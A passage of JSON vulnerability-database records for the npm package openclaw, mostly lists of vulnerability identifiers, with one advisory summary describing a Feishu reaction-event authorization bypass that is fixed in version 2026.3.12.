3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-28483","GHSA-r54r-wmmq-mh84"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fjfw-xwxw-u3at"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91206?format=json","vulnerability_id":"VCID-ftdn-9fum-cbe4","summary":"OpenClaw: Feishu reaction events could bypass group authorization and mention gating\n### Summary\n\nA Feishu reaction-originated synthetic event could misclassify a group conversation as `p2p` when the inbound reaction payload omitted `chat_type`. Authorization and mention-gating logic keyed off that incorrect chat type and evaluated the event as a direct message instead of a group message.\n\n### Impact\n\nThis could bypass `groupAllowFrom` and `requireMention` protections for reaction-derived events in Feishu group chats.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. Reaction events now preserve the correct group context before authorization and mention-gate evaluation. Users should update to `2026.3.12` or later.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3e730c0332eb0a3dc9e1e8c29a5f95e933317b41","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/3e730c0332eb0a3dc9e1e8c29a5f95e933317b41"},{"reference_url":"https://github.com/openclaw/openclaw/pull/44088","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/44088"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m69h-jm2f-2pv8","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m69h-jm2f-2pv8"},{"reference_url":"https://github.com/advisories/GHSA-m69h-jm2f-2pv8","reference_id":"GHSA-m69h-jm2f-2pv8","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m69h-jm2f-2pv8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-m69h-jm2f-2pv8"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ftdn-9fum-cbe4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89523?f